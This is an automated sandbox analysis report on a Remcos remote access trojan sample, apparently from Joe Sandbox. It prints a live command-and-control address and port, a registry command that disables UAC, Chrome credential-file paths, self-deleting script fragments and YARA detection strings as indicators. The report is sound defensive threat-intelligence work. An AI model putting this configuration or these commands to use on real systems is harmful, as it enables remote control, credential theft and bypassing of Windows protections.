Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe

Overview

General Information

Sample name:1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe
Analysis ID:1570007
MD5:68011a26bb98d3b77de9594ae7624358
SHA1:e065720bd4e4299160f7cbbee1708cd91140dff1
SHA256:6a050c9c875f5748908ab6c4ced355dd530137e98f3b28f06807c454c52a6dbe
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Machine Learning detection for sample
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["104.243.246.120:2030:1"], "Assigned name": "Final", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4NJUM7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
      1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aaf8:$a1: Remcos restarted by watchdog!
        • 0x6b070:$a3: %02i:%02i:%02i:%03i
        1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeREMCOS_RAT_variantsunknownunknown
        • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64e04:$str_b2: Executing file:
        • 0x65c3c:$str_b3: GetDirectListeningPort
        • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65780:$str_b7: \update.vbs
        • 0x64e2c:$str_b9: Downloaded file:
        • 0x64e18:$str_b10: Downloading file:
        • 0x64ebc:$str_b12: Failed to upload file:
        • 0x65c04:$str_b13: StartForward
        • 0x65c24:$str_b14: StopForward
        • 0x656d8:$str_b15: fso.DeleteFile "
        • 0x6566c:$str_b16: On Error Resume Next
        • 0x65708:$str_b17: fso.DeleteFolder "
        • 0x64eac:$str_b18: Uploaded file:
        • 0x64e6c:$str_b19: Unable to delete:
        • 0x656a0:$str_b20: while fso.FileExists("
        • 0x65349:$str_c0: [Firefox StoredLogins not found]
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x146f8:$a1: Remcos restarted by watchdog!
              • 0x14c70:$a3: %02i:%02i:%02i:%03i
              00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                Click to see the 8 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                      • 0x6aaf8:$a1: Remcos restarted by watchdog!
                      • 0x6b070:$a3: %02i:%02i:%02i:%03i
                      1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                      • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                      • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                      • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                      • 0x64e04:$str_b2: Executing file:
                      • 0x65c3c:$str_b3: GetDirectListeningPort
                      • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                      • 0x65780:$str_b7: \update.vbs
                      • 0x64e2c:$str_b9: Downloaded file:
                      • 0x64e18:$str_b10: Downloading file:
                      • 0x64ebc:$str_b12: Failed to upload file:
                      • 0x65c04:$str_b13: StartForward
                      • 0x65c24:$str_b14: StopForward
                      • 0x656d8:$str_b15: fso.DeleteFile "
                      • 0x6566c:$str_b16: On Error Resume Next
                      • 0x65708:$str_b17: fso.DeleteFolder "
                      • 0x64eac:$str_b18: Uploaded file:
                      • 0x64e6c:$str_b19: Unable to delete:
                      • 0x656a0:$str_b20: while fso.FileExists("
                      • 0x65349:$str_c0: [Firefox StoredLogins not found]
                      Click to see the 7 entries

                      Sigma Signatures

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Remcos
                      Source: Registry Key setAuthor: Joe Security: Data: Details: 33 01 89 C1 1C 52 5C 82 B2 E1 37 BF 6F 6A AF 94 7B 15 D0 1A 8C AB 60 67 17 23 3C 40 AB 7C A9 9F 5C 7E 31 A1 25 95 37 D7 33 24 59 76 3D 76 6F 7E B6 F5 1D E5 49 7C 92 12 E0 B0 33 A6 12 32 71 44 52 93 6F 8A C3 E4 32 99 44 76 3B B6 3B F4 32 62 14 EF 16 5F A6 A3 FD B3 72 B5 71 14 40 87 5A FC A9 8E C3 AD 4E 39 D9 12 D1 5A E6 92 36 BF 0E 15 4D 1B 64 3F E1 4A 32 DA 83 02 0F 42 61 37 7B E0 4E DC 34 56 D9 59 71 A7 A7 EE 96 1E 84 ED 17 76 8A 02 AB 63 1D 03 D1 EB CC 8F 42 E8 E6 53 DD 81 65 2B 32 46 CD 65 1E A2 10 4A 72 88 7D 07 F4 92 79 A8 60 16 2A 52 A6 E3 3E 9A 6D 2D 66 81 5C 6F 9F 6A 1A 2E 17 1F 2A 61 14 5F 9F 81 CF 61 7D B0 E5 90 B4 CB 1C 1C E3 0A 21 C0 61 06 A4 5D 83 27 91 FA 62 6E 70 04 A4 DA 9E D3 92 17 9D AA 83 AB , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, ProcessId: 5272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-4NJUM7\exepath

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-06T14:11:10.451566+010020365941Malware Command and Control Activity Detected192.168.2.650002104.243.246.1202030TCP
                      2024-12-06T14:11:40.154154+010020365941Malware Command and Control Activity Detected192.168.2.649731104.243.246.1202030TCP
                      2024-12-06T14:12:03.185927+010020365941Malware Command and Control Activity Detected192.168.2.649792104.243.246.1202030TCP
                      2024-12-06T14:12:26.201641+010020365941Malware Command and Control Activity Detected192.168.2.649844104.243.246.1202030TCP
                      2024-12-06T14:12:49.249157+010020365941Malware Command and Control Activity Detected192.168.2.649900104.243.246.1202030TCP
                      2024-12-06T14:13:12.280515+010020365941Malware Command and Control Activity Detected192.168.2.649953104.243.246.1202030TCP
                      2024-12-06T14:13:35.315155+010020365941Malware Command and Control Activity Detected192.168.2.649995104.243.246.1202030TCP
                      2024-12-06T14:13:58.359734+010020365941Malware Command and Control Activity Detected192.168.2.649996104.243.246.1202030TCP
                      2024-12-06T14:14:21.406877+010020365941Malware Command and Control Activity Detected192.168.2.649998104.243.246.1202030TCP
                      2024-12-06T14:14:44.439475+010020365941Malware Command and Control Activity Detected192.168.2.649999104.243.246.1202030TCP
                      2024-12-06T14:15:07.501287+010020365941Malware Command and Control Activity Detected192.168.2.650001104.243.246.1202030TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeAvira: detected
                      Found malware configuration
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeMalware Configuration Extractor: Remcos {"Host:Port:Password": ["104.243.246.120:2030:1"], "Assigned name": "Final", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4NJUM7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                      Multi AV Scanner detection for submitted file
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeReversingLabs: Detection: 87%
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.5% probability
                      Machine Learning detection for sample
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,1_2_0043293A
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_3adf2d00-3

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00406764 _wcslen,CoGetObject,1_2_00406764
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B42F
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0044D5E9 FindFirstFileExA,1_2_0044D5E9
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418C69
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49731 -> 104.243.246.120:2030
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49792 -> 104.243.246.120:2030
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49844 -> 104.243.246.120:2030
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49900 -> 104.243.246.120:2030
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49995 -> 104.243.246.120:2030
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49996 -> 104.243.246.120:2030
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49953 -> 104.243.246.120:2030
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49998 -> 104.243.246.120:2030
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50001 -> 104.243.246.120:2030
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49999 -> 104.243.246.120:2030
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50002 -> 104.243.246.120:2030
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 104.243.246.120
                      Source: global trafficTCP traffic: 192.168.2.6:49731 -> 104.243.246.120:2030
                      Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.243.246.120
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004260F7 recv,1_2_004260F7
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeString found in binary or memory: http://geoplugin.net/json.gp
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeString found in binary or memory: http://geoplugin.net/json.gp/C

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000001_2_004099E4
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004159C6
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004159C6
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004159C6
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,1_2_00409B10
                      Source: Yara matchFile source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
